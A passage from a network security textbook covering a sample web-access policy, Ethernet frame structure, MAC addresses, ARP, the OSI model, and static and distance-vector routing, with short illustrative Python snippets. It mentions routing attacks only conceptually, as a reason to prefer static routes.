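In firewall terms, the restrictive stance is simple to picture. The toy decision function below implements “that which is not expressly permitted is denied”; the permit list is invented for illustration.

    # Toy illustration of the restrictive stance: traffic is allowed only
    # if it matches an explicit permit rule; everything else is denied.
    # The permit list is invented for illustration.
    PERMITTED = {
        # (destination port, protocol)
        (25, "tcp"),     # inbound mail
        (80, "tcp"),     # public Web server
    }

    def filter_decision(dst_port, protocol):
        """Return 'permit' only for expressly permitted traffic."""
        if (dst_port, protocol) in PERMITTED:
            return "permit"
        return "deny"    # the default for anything not expressly permitted

    print(filter_decision(80, "tcp"))    # permit
    print(filter_decision(23, "tcp"))    # deny: Telnet was never permitted

The open stance would simply invert the default. Either way, the value of stating a default is that traffic (or a policy question) you never anticipated still gets a defined answer.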
Example of a Good Policy Statement
Now that we have covered the individual points of a good security policy, let’s look at a specific example to see how to tie these points together. You will find more examples in Appendix B.

The following is an example of a policy statement excerpt:

Accessing Internet-based Web server resources shall only be allowed for the express purpose of performing work-related duties. This policy is to insure the effective use of networking resources and shall apply equally to all employees. This policy shall be enforced during both production and non-production time periods. All Web server access can be monitored by networking personnel, and employees may be required to justify Web server access to their direct supervisor. Failure to comply with this policy will result in the issuance of a written warning. For more information regarding what is considered appropriate Web server access of Internet resources, please consult your direct supervisor.

Now let’s see if this statement includes everything we have discussed.

Define Each Issue This policy specifically addresses “access to Internet-based Web server resources.” The statement clearly defines the issue to which it pertains.

Your Organization’s Position The statement goes on to declare that Internet access “shall only be allowed for the express purpose of performing work-related duties.” The organization’s stance is clear: Web browsing is for performing work-related activities only.

Justifying the Policy To justify restriction of Internet access, the policy states, “This policy is to insure the effective use of networking resources.” Again, the wording is clear and to the point. The organization is looking to minimize Internet traffic by restricting Internet use to work-related functions only.

When Does the Issue Apply? The policy specifies that Internet access restrictions “shall apply equally to all employees. This policy shall be enforced during both production and non-production time periods.” This spells out that the policy is in effect at all times and that all employees are subject to its guidelines.

Roles and Responsibilities The policy goes on to state that networking personnel are responsible for monitoring proper Web server access and adds that “employees may be required to justify Web server access to their direct supervisor.” This requires each employee to justify all Internet Web server access. It also shows that supervisors are responsible for approving these justifications. The document assumes that some mechanism is in place to notify the supervisor when her subordinates access Internet Web servers.

Consequences of Noncompliance The policy goes on to state, “Failure to comply with this policy will result in the issuance of a written warning.” Short, sweet, and to the point, this sentence shows what may happen if an employee violates this portion of the security policy.

Contact Information for Further Details Finally, the policy directs, “For more information regarding what is considered appropriate Web server access of Internet resources, please consult your direct supervisor.” The policy tells readers what information is available and where to get it. (The policy does assume here that the supervisor knows the answers or where to get them.)
Level of Privacy Privacy is mentioned only briefly in our sample policy excerpt, but the policy still goes straight to the point: “All Web server access can be monitored by networking personnel.” This implies that the user can expect zero privacy when accessing Internet-based Web servers. This statement does not, however, define the level of monitoring that may be performed. For example, it does not specify whether network personnel will review the servers visited, the URLs, or the actual page content. In this case, lack of specificity should not be considered a bad thing, because it allows the network administrator some flexibility in the level of audits.

Summary
You should now have a sound understanding of how to evaluate the level of security your environment requires. You should know which assets you need to protect and their inherent value to your organization. This risk analysis will be the cornerstone for each of the security precautions discussed in this book.

You should also know how to write an effective security policy, understanding the importance of a precise security policy to securing your environment.

In the next chapter, we will take a look at how systems communicate. Many security exploits involve “bending” the communication rules, so comprehending how network information is exchanged is vital to securing against such attacks.

Chapter 3: Understanding How Network Systems Communicate
In this chapter, we will review how networked systems move data from point A to point B. I am assuming that you already understand the basics of networking, such as how to assign a valid network address to a device. This chapter will focus on exactly what is going on behind the scenes and along your network cabling. This knowledge is critical in order to give context to the security concepts covered in subsequent chapters.

The Anatomy of a Frame of Data
When data is moved along a network, it is packaged inside a delivery envelope called a frame. Frames are topology-specific. An Ethernet frame needs to convey different information than a Token Ring or an ATM frame. Since Ethernet is by far the most popular topology, we will cover it in detail here.

Ethernet Frames
An Ethernet frame is a set of digital pulses transmitted onto the transmission media in order to convey information. An Ethernet frame can be anywhere from 64 to 1,518 bytes (a byte being 8 digital pulses, or bits) in size and is organized into four sections:
• Preamble
• Header
• Data
• Frame check sequence

Preamble A preamble is a defined series of communication pulses that tells all receiving stations, “Get ready—I’ve got something to say.” The standard preamble is eight bytes long.

Note Because the preamble is considered part of the communication process and not part of the actual information being transferred, it is not usually included when measuring a frame’s size.

Header A header always contains information about who sent the frame and where it is going. It may also contain other information, such as how many bytes the frame contains; this is referred to as the length field and is used for error correction. If the receiving station measures the frame to be a different size than indicated in the length field, it asks the transmitting system to send a new frame.
If the length field is not used, the header may instead contain a type field that describes what type of Ethernet frame it is.

Note The header size is always 14 bytes.

Data The data section of the frame contains the actual data the station needs to transmit, as well as any protocol information, such as the source and destination IP addresses. The data field can be anywhere from 46 to 1,500 bytes in size. If a station has more than 1,500 bytes of information to transfer, it will break up the information over multiple frames and identify the proper order by using sequence numbers. Sequence numbers identify the order in which the destination system should reassemble the data. This sequence information is also stored in the data portion of the frame.

If the frame does not have 46 bytes’ worth of information to convey, the station pads the end of this section with filler bits (remember that digital connections use binary numbers). Depending on the frame type, this section may also contain additional information describing what protocol or method of communication the systems are using.

Frame Check Sequence (FCS) The frame check sequence is used to insure that the data received is actually the data sent. The transmitting system generates the FCS by running the values of the other frame fields through an algorithm called a cyclic redundancy check, or CRC, which produces a 4-byte number. When the destination system receives the frame, it runs the same CRC and compares the result to the value within this field. If the destination system finds a match, it assumes the frame is free of errors and processes the information. If the comparison fails, the destination station assumes that something happened to the frame in its travels and requests that another copy of the frame be sent by the transmitting system.

Note The FCS size is always 4 bytes.
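To make the FCS idea concrete, the sketch below mimics the sender and receiver sides using the standard 32-bit CRC from Python’s library. Real Ethernet hardware applies the CRC with specific bit-ordering rules that are glossed over here, and the payload is invented; the point is only that the receiver recomputes the value and compares it.

    # Minimal illustration of frame-check-sequence behavior using a
    # standard 32-bit CRC. The payload is invented example data.
    import zlib

    payload = b"Hello, Wren!"
    padded = payload.ljust(46, b"\x00")   # pad to the 46-byte data minimum

    fcs = zlib.crc32(padded)              # sender: compute the 4-byte value
    print(f"FCS: {fcs:#010x}")

    # Receiver: recompute the CRC and compare it to the received FCS.
    print("frame OK" if zlib.crc32(padded) == fcs else "request a resend")

    # A single flipped bit changes the CRC, so damage is detected.
    damaged = b"hello" + padded[5:]
    print("frame OK" if zlib.crc32(damaged) == fcs else "request a resend")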
The Frame Header Section
Now that we have a better understanding of what an Ethernet frame is, let’s take a closer look at the header section. The header information is ultimately responsible for identifying who sent the data and where the sender wanted it to go.

The header contains two fields to identify the source and destination of the transmission. These are the node addresses of the source and destination systems. This number is also referred to as the media access control (MAC) address. The node address is a unique number assigned to each network device (a network card or other networking hardware) when it is manufactured, distinguishing it from every other networking device in the world. No two networking devices should ever be assigned the same number. Think of this number as equivalent to a telephone number. Every home with a telephone has a unique phone number so that the phone company knows where to direct the call. In this same fashion, a system will use the destination system’s MAC address to send the frame to the proper system.

Note The MAC address has nothing specifically to do with Apple’s computers and is always represented in all capital letters. It is the number used by all the systems attached to the network (PCs and Macs included) to uniquely identify themselves.

This 6-byte, 12-digit hexadecimal number is broken up into two parts. The first half of the address is the manufacturer’s identifier. A manufacturer is assigned a range of MAC addresses to use when serializing its devices. Some of the more prominent MAC addresses appear in Table 3.1.

Table 3.1: Common MAC Addresses

First Three Bytes of MAC Address    Manufacturer
00000C                              Cisco
0000A2                              Bay Networks
0080D3                              Shiva
00AA00                              Intel
02608C                              3Com
080009                              Hewlett-Packard
080020                              Sun
08005A                              IBM

Tip The first three bytes of the MAC address can be a good troubleshooting aid. If you are investigating a problem, try to determine the source MAC address. Knowing who made the device may put you a little closer to determining which system is giving you trouble. For example, if the first three bytes are 0000A2, you know you need to focus your attention on any Bay Networks device on your network.

The second half of the MAC address is the serial number the manufacturer has assigned to the device.

One address worthy of note is FF-FF-FF-FF-FF-FF. This is referred to as a broadcast address. A broadcast address is special: it means all systems receiving this packet should read the included data. If a system sees a frame that has been sent to the broadcast address, it will read the frame and process the data if it can.

Note You should never encounter a frame that has a broadcast address in the source node field. The Ethernet specifications do not include any conditions where the broadcast address should be placed in the source node field.
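Splitting an address into its two halves is a one-line job, which is why the troubleshooting Tip above works so well. Here is a small sketch using the vendor prefixes from Table 3.1; the address being looked up is invented.

    # Split a MAC address into its manufacturer prefix and serial number,
    # using the vendor prefixes from Table 3.1. The sample address is invented.
    OUI_TABLE = {
        "00000C": "Cisco",
        "0000A2": "Bay Networks",
        "0080D3": "Shiva",
        "00AA00": "Intel",
        "02608C": "3Com",
        "080009": "Hewlett-Packard",
        "080020": "Sun",
        "08005A": "IBM",
    }

    def identify(mac):
        """Return (manufacturer, serial) for a 12-digit hex MAC address."""
        digits = mac.replace("-", "").replace(":", "").upper()
        prefix, serial = digits[:6], digits[6:]
        return OUI_TABLE.get(prefix, "unknown vendor"), serial

    print(identify("00-00-A2-4F-11-D9"))    # ('Bay Networks', '4F11D9')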
\n" }, { "page_number": 30, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 30\n \nFigure 3.2: Node addresses are used for local communications only. \nOur router will then need to send an ARP out of Port B in order to discover the node address of Wren. Once Wren \nreplies to this ARP request, the router will strip off the Ethernet frame from the data and create a new one. The \nrouter replaces the source node address (originally Fritz’s node address) with the node address of Port B. It will \nalso replace the destination node address (originally Port A) with the node address of Wren. \nNote \nIn order for the router to communicate on both subnets, it needed two unique \nnode addresses, one for each port. If Fritz were launching an attack against \nWren, you could not use the source node address within the frame on Wren’s \nsubnet in order to identify the transmitting system. While the source node address \nwill tell you where the data entered this subnet, it will not identify the original \ntransmitting system. \nWhen Fritz realized that Wren was not on the same subnet, he went looking for a router. A system will run \nthrough a process similar to that shown in Figure 3.3 when determining how best to deliver data. Once a system \nknows where it needs to send the information, it transmits the appropriate ARP request. \n \nFigure 3.3: ARP decision process \nAll systems are capable of caching information learned through ARP requests. For example, if Fritz wished a few \nseconds later to send another packet of data to Wren, he would not have to transmit a new ARP request for the \nrouter’s node address since this value would be saved in memory. This memory area is referred to as the ARP \ncache. \nARP cache entries are retained for up to 60 seconds. After that, they are typically flushed out and must be learned \nagain through a new ARP request. It is also possible to create static ARP entries, which creates a permanent entry \nin the ARP cache table. This way, a system is no longer required to transmit ARP requests for nodes with a static \nentry. \nFor example, you could create a static ARP entry for the router on Fritz’s machine so that it would no longer have \nto transmit an ARP request when looking for this device. The only problem would occur if the router’s node \n" }, { "page_number": 31, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 31\naddress changed. If the router were to fail and you had to replace it with a new one, you would also have to go \nback to Fritz’s system and modify the static ARP entry because the new router would have a different node \naddress. \n \n \nA Protocol’s Job \nYou have seen that when a system wants to transfer information to another system, it does so by \ncreating a frame with the target system’s node address in the destination field of the frame header. \nThis method of communication is part of your topology’s communication rules. This transmission \nraises the following questions: \nƒ \nShould the transmitting system simply assume the frame was received in one piece? \nƒ \nShould the destination system reply, saying, “I received your frame, thanks!”? \nƒ \nIf a reply should be sent, does each frame require its own acknowledgment, or is it OK to \nsend just one for a group of frames? \nƒ \nIf the destination system is not on the same local network, how do you figure out where to \nsend your data? 
A Protocol’s Job
You have seen that when a system wants to transfer information to another system, it does so by creating a frame with the target system’s node address in the destination field of the frame header. This method of communication is part of your topology’s communication rules. This transmission raises the following questions:
• Should the transmitting system simply assume the frame was received in one piece?
• Should the destination system reply, saying, “I received your frame, thanks!”?
• If a reply should be sent, does each frame require its own acknowledgment, or is it OK to send just one for a group of frames?
• If the destination system is not on the same local network, how do you figure out where to send your data?
• If the destination system is running e-mail, transferring a file, and browsing Web pages on the source system, how does it know which application this data is for?

This is where a protocol comes in. A protocol’s job is to answer these questions—as well as any others that may pop up in the course of the communication. When we talk about IP, IPX, AppleTalk, or NetBEUI, we are talking about protocols. So why are the specifications that characterize a protocol not simply defined by the topology?

The answer is: diversity. If the communication properties of IP were tied into the Ethernet topology, everyone would be required to use Ethernet for all network segments, including wide-area network links. You could not choose Token Ring or ATM, because IP’s services would be available only over Ethernet. By defining a separate set of communication rules (protocols), these rules can be applied over any OSI-compliant topology. This was not the case with legacy systems, which is why the OSI model was developed.

The OSI Model
In 1977, the International Standards Organization (ISO) developed the Open Systems Interconnection Reference Model (OSI model) to help improve communications between different vendors’ systems. The ISO was a committee representing many different organizations, whose goal was not to favor a specific method of communication but to develop a set of guidelines that would allow vendors to insure that their products would interoperate.

The ISO was setting out to simplify communications between systems. Many events must take place in order to insure that data first reaches the correct system and is then passed along to the correct application in a usable format. A set of rules was required to break down the communication process into a simple set of building blocks.

The OSI model consists of seven layers. Each layer describes how its portion of the communication process should function, as well as how it will interface with the layers directly above it, below it, and adjacent to it on other systems. This allows a vendor to create a product that operates on a certain level and to be sure it will operate in the widest range of applications. If the vendor’s product follows a specific layer’s guidelines, it should be able to communicate with products created by other vendors that operate at adjacent layers.

To use the analogy of a house for just a moment, think of the lumber yard that supplies the main support beams used in house construction. As long as the yard follows the guidelines for thickness and material, builders can expect the beams to function correctly in any house that has a proper foundation structure.

Simplifying a Complex Process
An analogy to the OSI model would be the process of building a house. While the final product may seem a complex piece of work, it is much simpler when it is broken down into manageable sections.

A good house starts with a foundation. There are rules that define how wide the foundation wall must be, as well as how far below the frost line it needs to sit. After that, the house is framed out. Again, there are rules to define how thick the lumber must be and how far each piece of framing can span without support.
Once the house is framed, there is a defined process for putting on a roof, adding walls, and even connecting the electrical system and plumbing. By breaking down this complicated process into small, manageable sections, building a house becomes easier. This breakdown also makes it easier to define who is responsible for which section. For example, the electrical contractor's responsibilities include running wires and adding electrical outlets, but not shingling the roof.

The entire structure becomes an interwoven tapestry, with each piece relying on the others. For example, the frame of our house requires a solid foundation. Without it, the frame will eventually buckle and fall. The frame may also require that load-bearing walls be placed in certain areas of the house in order to insure that the frame does not fall in on itself.

The OSI model strives to set up these same kinds of definitions and dependencies. Each portion of the communication process becomes a separate building block. This makes it easier to determine what each portion of the communication process is required to do. It also helps to define how each piece will be connected to the others.

Figure 3.4 is a representation of the OSI model in all its glory. Let's take the layers one at a time to determine the functionality expected of each.

Figure 3.4: The OSI model

Physical Layer  The physical layer describes the specifications of our transmission media, connectors, and signal pulses. A repeater or a hub is a physical layer device because it is frame-stupid: it simply amplifies the electrical signal on the wire and passes it along.

Data-Link Layer  The data-link layer describes the specifications for topology and communication between local systems. Ethernet is a good example of a data-link layer specification, as it works with multiple physical layer specifications (twisted-pair cable, fiber) and multiple network layer specifications (IPX, IP). The data-link layer is the "door between worlds," connecting the physical aspects of the network (cables and digital pulses) with the abstract world of software and data streams. Bridges and switches are considered data-link devices because they are frame-aware. Both use information specific to the frame header to regulate traffic.

Network Layer  The network layer describes how systems on different network segments find each other; it also defines network addresses. A network address is a name or number assigned to a group of physically connected systems.

Note: The network address is assigned by the network administrator and should not be confused with the MAC address assigned to each network card. The purpose of a network address is to facilitate data delivery over long distances. Its functionality is similar to the zip code used when mailing a regular letter.

IP, IPX, and AppleTalk's Datagram Delivery Protocol (DDP) are all examples of network-layer functionality. Service and application availability are based on functionality prescribed at this level.

Note: For more detail about network layer functionality, see "More on the Network Layer" later in this chapter.

Transport Layer  The transport layer deals with the actual manipulation of your data and prepares it for delivery through the network.
If your data is too large for a single frame, the transport layer breaks it up into smaller pieces and assigns sequence numbers. Sequence numbers allow the transport layer on the receiving system to reassemble the data into its original content. While the data-link layer performs a CRC check on all frames, the transport layer can act as a backup check to insure that all the data was received and is usable. Examples of transport layer functionality are IP's Transmission Control Protocol (TCP), IP's User Datagram Protocol (UDP), IPX's Sequenced Packet Exchange (SPX), and AppleTalk's AppleTalk Transaction Protocol (ATP).

Session Layer  The session layer deals with establishing and maintaining a connection between two or more systems. It insures that a query for a specific type of service is made correctly. For example, if you try to access a system with your Web browser, the session layers on both systems work together to insure you receive HTML pages and not e-mail. If a system is running multiple network applications, it is up to the session layer to keep these communications orderly and to insure that incoming data is directed to the correct application. In fact, the session layer maintains unique conversations even within a single service. For example, imagine downloading two distinct Web pages from the same Web site at the same time (from the same computer). The session layer maintains the integrity of each file transfer, making sure the two data streams aren't mixed up or otherwise confused by the receiving system.

Presentation Layer  The presentation layer insures that data is received in a format that is usable to applications running on the system. For example, if you are communicating over the Internet using encrypted communications, the presentation layer would be responsible for encrypting and decrypting this information. Most Web browsers support this kind of functionality for performing financial transactions over the Internet. Data and language translations are also done at this level.

Application Layer  The label application layer is a bit misleading, because this term does not describe the actual program that a user may be running on a system. Rather, this is the layer that is responsible for determining when access to network resources is required. For example, Microsoft Word does not function at the application layer of the OSI model. If a user tries to retrieve a document from her home directory on a server, however, the application layer networking software is responsible for delivering her request to the remote system.

Note: In geek lingo, the layers are numbered in the order I've described them. If I were to state that switches function at layer 2 of the OSI model, you would interpret this to mean that switches work within the guidelines provided by the data-link layer of the OSI model.

How the OSI Model Works

Let's look at an example to see how these layers work together. Assume you're using your word processing program, and you want to retrieve a file called resume.txt from your home directory on a remote server. The networking software running on your system would react similarly to the description that follows.

Formulating a File Request

The application layer detects that you are requesting information from a remote file system.
It formulates a request to that system, asking that resume.txt be read from disk. Once it has created this request, the application layer passes the request off to the presentation layer for further processing.

The presentation layer determines whether it needs to encrypt this request or perform any type of data translation. Once this has been determined and completed, the presentation layer adds any information it needs to pass along to the presentation layer on the remote system and forwards the packet down to the session layer.

The session layer checks which application is requesting the information and verifies what service is being requested from the remote system (file access). The session layer adds information to the request to ensure that the remote system knows how to handle this request. Then it passes all this information along to the transport layer.

The transport layer ensures that it has a reliable connection to the remote system and begins the process of breaking down all the information so that it can be packaged into frames. If more than one frame is required, the information is split up and each block of information is assigned a sequence number. These sequenced chunks of information are passed one at a time down to the network layer.

The network layer receives the blocks of information from the transport layer and adds the network address for both this and the remote system. This is done to each block before it is passed down to the data-link layer.

At the data-link layer, the blocks are packaged into individual frames. As shown in Figure 3.5, all the information added by each of the previous layers (as well as the actual file request) must fit into the 46- to 1,500-byte data field of the Ethernet frame. The data-link layer then adds a frame header, which consists of the source and destination MAC addresses, and uses this information (along with the contents of the data field) to create a CRC trailer. The data-link layer is then responsible for transmitting the frame according to the topology rules in use on the network. Depending on the topology, this could mean listening for a quiet moment on the network, waiting for a token, or waiting for a specific time division before transmitting the frame.

Note: The physical layer does not add any information to the frame.

Figure 3.5: The location of each layer's information within our frame

The physical layer is responsible for carrying the information from the source system to its destination. Because the physical layer has no knowledge of frames, it simply passes along the digital signal pulses transmitted by the data-link layer. The physical layer is the medium by which a connection is made between the two systems; it is responsible for carrying the signal to the data-link layer on the remote system.

Your workstation has successfully formulated your data request ("Send me a copy of resume.txt.") and transmitted it to the remote system. At this point, the remote system follows a similar process, but in reverse.
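Before we follow the frame up the remote system's stack, here is a compact Python sketch of the layering just described. The header layouts are invented for readability (real headers are packed binary structures, and the "CRC" here is a stand-in, not a true CRC); the point is simply that each layer wraps what it receives from the layer above:

def application_layer(filename):
    # Formulate the file request itself.
    return f"READ {filename}".encode()

def transport_layer(data, seq):
    # Break-up and sequencing would happen here; one chunk keeps it short.
    return f"TP|seq={seq}|".encode() + data

def network_layer(segment, src_net, dst_net):
    # Add the logical network addresses of both systems.
    return f"NET|src={src_net}|dst={dst_net}|".encode() + segment

def data_link_layer(packet, src_mac, dst_mac):
    # Add the frame header (MAC addresses) and a trailer computed over the data.
    header = f"DL|{src_mac}->{dst_mac}|".encode()
    trailer = f"|CRC={sum(packet) % 256}".encode()
    return header + packet + trailer

request = application_layer("resume.txt")
segment = transport_layer(request, seq=1)
packet = network_layer(segment, "10.1.0.0", "10.2.0.0")
frame = data_link_layer(packet, "00:10:4b:01", "00:10:4b:02")
print(frame)  # each layer's information wraps the layer above, per Figure 3.5
# The receiving system peels these wrappers off in the reverse order.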
Receiving Data on the Remote System

The data-link layer on the remote system reads in the transmitted frame. It notes that the MAC address in the destination field of the header is its own and recognizes that it needs to process this request. It performs a CRC check on the frame and compares the results to the value stored in the frame trailer. If these values match, the data-link layer strips off the header and trailer and passes the data field up to the network layer. If the values do not match, the data-link layer sends a request to the source system asking that another frame be sent.

The network layer on the remote system analyzes the information recorded by the network layer on the source system. It notes that the destination software address is its own. Once this analysis is complete, the network layer removes information related to this level and passes the remainder up to the transport layer.

The transport layer receives the information and analyzes the information recorded by the transport layer on the source system. If it finds that packet sequencing was used, it queues any information it receives until all the data has arrived. If any of the data is missing, the transport layer uses the sequence information to formulate a reply to the source system, requesting that the missing piece of data be resent. Once all the data has been received, the transport layer strips out any transport information and passes the full request up to the session layer.

The session layer receives the information and verifies that it is from a valid connection. If the check is positive, the session layer strips out any session information and passes the request up to the presentation layer.

The presentation layer receives the frame and analyzes the information recorded by the presentation layer on the source system. It then performs any translation or decryption required. Once translation or decryption has been completed, it strips out the presentation layer information and passes the request up to the application layer.

The application layer insures that the correct process running on the system receives the request for data. Because this is a file request, it is passed to whichever process is responsible for access to the file system.

This process then reads the requested file and passes the information back to the application layer. At this point, the entire process of passing the information through each of the layers repeats. If you're amazed that the requested file is retrievable in anything less than a standard coffee break, then you have a pretty good idea of the magnitude of what happens when you request a simple file.

More on the Network Layer

As I mentioned earlier, the network layer is used for delivery of information between logical networks.

Note: A logical network is simply a group of systems assigned a common network address by the network administrator. These systems may be grouped together because they share a common geographical area or a central point of wiring.

Network Addresses

The terminology used for network addresses differs depending on the protocol in use. If the protocol in use is IPX, the logical network is simply referred to as a network address. With IP it is a subnet, and with AppleTalk it is called a zone.

Note: NetBIOS and NetBEUI are non-routable protocols, although NetBEUI can be thought of as overlapping the transport, network, and (the LLC portion of the) data-link layers. They do not use network numbers and do not have the ability to propagate information between logical network segments. A non-routable protocol is a set of communication rules that expects all systems to be connected locally.
A non-routable protocol has no direct method of traveling between logical networks. A NetBIOS frame is incapable of crossing a router without some form of help.

Routers

Routers are used to connect logical networks, which is why they are sometimes referred to in the IP world as gateways. Figure 3.6 shows the effect of adding a router to a network. Notice that protocols on either side of the device must now use a unique logical network address. Information destined for a non-local system must be routed to the logical network on which that system resides. The act of traversing a router from one logical network to another is referred to as a hop. When a protocol hops a router, it must use a unique logical network address on both sides.

Figure 3.6: The effects of adding a router to the network

So how do systems on one logical network segment find out what other logical segments exist on the network? Routers can either be statically programmed with information describing the path to follow in order to reach remote networks, or they can use a special type of maintenance frame, such as those defined by the routing information protocol (RIP), to relay information about known networks. Routers use these frames and static entries to create a blueprint of the network known as a routing table.

Note: Routing tables tell the router which logical networks are available to deliver information to and which routers are capable of forwarding information to those networks.

Routing Tables

You can think of a routing table as being like a road map. A road map shows all the streets in a local city or town in much the same way a routing table keeps track of all the local networks. Without some method for each of these routers to communicate and let each other know who is connected where, communication between logical network segments would be impossible.

There are three methods for routing information from one network to another:

• Static
• Distance vector
• Link state

While each protocol has its own ways of providing routing functionality, each implementation can be broken down into one of these three categories.

Static Routing

Static routing is the simplest method of getting information from one system to another. Used mostly in IP networks, a static route defines a specific router to be the point leading to a specific network. Static routing does not require routers to exchange route information; it relies on a configuration file that directs all traffic bound for a specific network to a particular router. This, of course, assumes that you can predefine all the logical networks you will wish to communicate with. When this is not feasible (for example, when you are communicating on the Internet), a single router may be designated as a default to receive all traffic destined for networks that have not been predefined. When static routing is used, most workstations receive an entry for the default router only.

For example, let's assume I configure my system to have a default route that points to the router Galifrey. As my system passes information through the network layer, it will analyze the logical network of the destination system. If the destination is located on the same logical network, the data-link layer adds the MAC address of that system and transmits the frame onto the wire. If the destination is located on some other logical network, the data-link layer will use the MAC address of Galifrey and transmit the frame to it. Galifrey would then be responsible for insuring that the frame gets to its final destination.
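That deliver-locally-or-use-the-default-route decision can be sketched in a few lines of Python. The addresses, and the use of the standard ipaddress module to stand in for the network layer's comparison, are illustrative only:

import ipaddress

LOCAL_NET = ipaddress.ip_network("192.168.10.0/24")   # our logical network
DEFAULT_ROUTER = "192.168.10.1"                       # "Galifrey"

def next_hop(destination_ip):
    # Return the address we should ARP for in order to deliver this packet.
    if ipaddress.ip_address(destination_ip) in LOCAL_NET:
        return destination_ip    # same logical network: deliver directly
    return DEFAULT_ROUTER        # anywhere else: hand it to the default route

print(next_hop("192.168.10.57"))  # -> 192.168.10.57 (local delivery)
print(next_hop("172.16.4.9"))     # -> 192.168.10.1  (send to Galifrey)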
The benefits of this type of routing are simplicity and low overhead. My workstation is not required to know or care about what other logical networks may be available and how to get to them. It has only two possibilities to worry about: deliver locally or deliver to Galifrey. This can be useful when there is only one possible route to a final destination. For example, most organizations have only one Internet connection. Setting up a static route that points all IP traffic to the router that borders this connection may be the easiest way to insure that all frames are delivered properly. Because all my routing information is configured at startup, my routers do not need to share route information with other routers. Each system is concerned only with forwarding information to its default router. I do not need to have any dynamic routing frames propagated through my network, because each router has been preset as to where it should forward information.

While static routing is easy to use, it suffers from some major drawbacks that severely limit its application. When redundant paths are provided, or even when multiple routers are used on the same logical network, you may find it more effective to use a routing method that is capable of exchanging dynamic routing information. Dynamic routing allows routing tables to be developed on the fly, which can compensate for hardware failures. Both distance vector and link state routing use dynamic routing information to insure routing tables stay up to date.

Static Routing Security

While static routing requires a high level of maintenance, it is also the most secure method of building your routing tables. Dynamic routing allows routing tables to be updated dynamically by devices on the network. An attacker can exploit this feature in order to feed your routers incorrect routing information, thus preventing your network from functioning properly. In fact, depending on the dynamic routing protocol you use, an attacker may only need to feed this bogus information to a single router. The compromised router would then take care of propagating the bogus information throughout the rest of the network.

Each static router is responsible for maintaining its own routing table. This means that if one router is compromised, the effects of the attack are not automatically spread to every other router. A router using static routing can still be vulnerable to ICMP redirect attacks, but its routing tables cannot be corrupted through the propagation of bad route information.

Note: For more information on ICMP, see the "Packet Filtering ICMP" section of Chapter 5.

Distance Vector Routing

Distance vector is the oldest and most popular form of creating routing tables, primarily due to the routing information protocol (RIP), which is based on distance vector. For many years, distance vector routing was the only dynamic routing option available, so it has found its way onto many networks. Distance vector routers build their tables on secondhand information.
A router will look at the tables being advertised by other routers and simply add 1 to the advertised hop values to create its own table. With distance vector, every router broadcasts its routing table once per minute.

Propagating Network Information with Distance Vector

Figure 3.7 shows how propagation of network information works with distance vector.

Figure 3.7: A routed network about to build its routing tables dynamically

Router A has just come online. Because the two attached networks (1 and 2) have been programmed into it, Router A immediately adds these to its routing table, assigning a hop value of 1 to each. The hop value is 1 instead of 0 because this information is relative to other attached networks, not the router itself. For example, if the router is advertising the route to Network 1 on Network 2, then one hop is appropriate, because any system sending information to Network 1 from Network 2 would have to travel one hop (the router itself) to get there. A router usually does not advertise routing information about a directly attached network on that network itself. This means that the router should not transmit a RIP frame stating, "I can reach Network 1 in one hop," on Network 1 itself.

So Router A sends out two RIP packets, one on each network, to let any other devices know about the connectivity it can provide. When Routers B and C receive these packets, they reply with RIP packets of their own. Remember that the network was already up and running, which means that all the other routers have already had an opportunity to build their tables. From these other RIP packets, Router A collects the information shown in Table 3.2.

Table 3.2: Routing Information Received by Router A

Router    Network    Hops to Get There
B         3          1
B         5          2
B         6          3
B         4          4
B         2          5
C         4          1
C         6          2
C         5          3
C         3          4
C         1          5

Router A will then analyze this information, picking the lowest hop count to each network in order to build its own routing table. Routes that require a larger hop count are not discarded but are retained in case an alternate route is required due to link failure. These higher hop values are simply ignored during the normal operation of the router. Once complete, the table appears similar to Table 3.3.

Table 3.3: Router A's Routing Table

Network    Hops to Get There    Next Router
1          1                    Direct connection
2          1                    Direct connection
3          2                    B
4          2                    C
5          3                    B
6          3                    C

All we've done is pick the lowest advertised hop count to each network and add 1 to that value. Once the table is complete, Router A will again broadcast two RIP packets, incorporating this new information.
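This lowest-hop-plus-one arithmetic is easy to verify for yourself. The short Python sketch below feeds the advertisements from Table 3.2 through that rule and reproduces Table 3.3 (the data structures are illustrative, not how a router stores its tables):

advertised = {
    "B": {3: 1, 5: 2, 6: 3, 4: 4, 2: 5},
    "C": {4: 1, 6: 2, 5: 3, 3: 4, 1: 5},
}

# Networks 1 and 2 are directly attached, so they go in at 1 hop.
table = {1: (1, "Direct connection"), 2: (1, "Direct connection")}

for router, routes in advertised.items():
    for network, hops in routes.items():
        if network in (1, 2):
            continue                  # directly attached; advertisements ignored
        candidate = hops + 1          # add 1 to the advertised hop count
        best = table.get(network)
        if best is None or candidate < best[0]:
            table[network] = (candidate, router)

for network in sorted(table):
    hops, via = table[network]
    print(f"Network {network}: {hops} hop(s) via {via}")
# Output matches Table 3.3: networks 3 and 4 at 2 hops, 5 and 6 at 3 hops.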
Now that Routers B and C have noted that there is a new router on the network, they must reevaluate their routing tables as well. Before Router A came online, the table for Router B would have looked like Table 3.4.

Table 3.4: Router B's Routing Table before Router A Initializes

Network    Hops to Get There    Next Router
1          1                    Direct connection
2          5                    D
3          1                    Direct connection
4          4                    D
5          2                    D
6          3                    D

Now that Router A is online, Router B will modify its table to reflect the information shown in Table 3.5.

Table 3.5: Router B's Routing Table after Router A Initializes

Network    Hops to Get There    Next Router
1          1                    Direct connection
2          2                    A
3          1                    Direct connection
4          3                    A
5          2                    D
6          3                    D

It takes two RIPs on the same logical network to get to this point. The first time Router A sent a RIP to Router B, it knew only about Network 2, as you can see in Figure 3.7. It was not until Router C sent a reply RIP that Router A had to send a second RIP frame to Router B, incorporating this new information. Table 3.5 would be broadcast with only the directly shared network information removed (Network 1). This means that while Router A was updating Router B with the information it had learned from Router C, it was also relaying back the route information originally sent to it by Router B, except that Router A had increased each hop count reported by Router B by 1. Because these hop values are larger than what Router B currently has in its tables, Router B simply ignores this information.

Router C goes through a similar process, adjusting its table according to the information it receives from Router A. Again, it will require two RIP frames on the same logical network to yield a complete view of our entire network so that Router C can complete the changes to its tables.

These changes would then begin to propagate down through our network. Router B would update Router D when A first comes online, and then again when it completes its tables. This activity would continue until all the routers have an accurate view of our new network layout. The amount of time required for all our routers to complete their table changes is known as the time to convergence. The convergence time is important, because our routing tables are in a state of flux until all our routers have stabilized with their new tables.

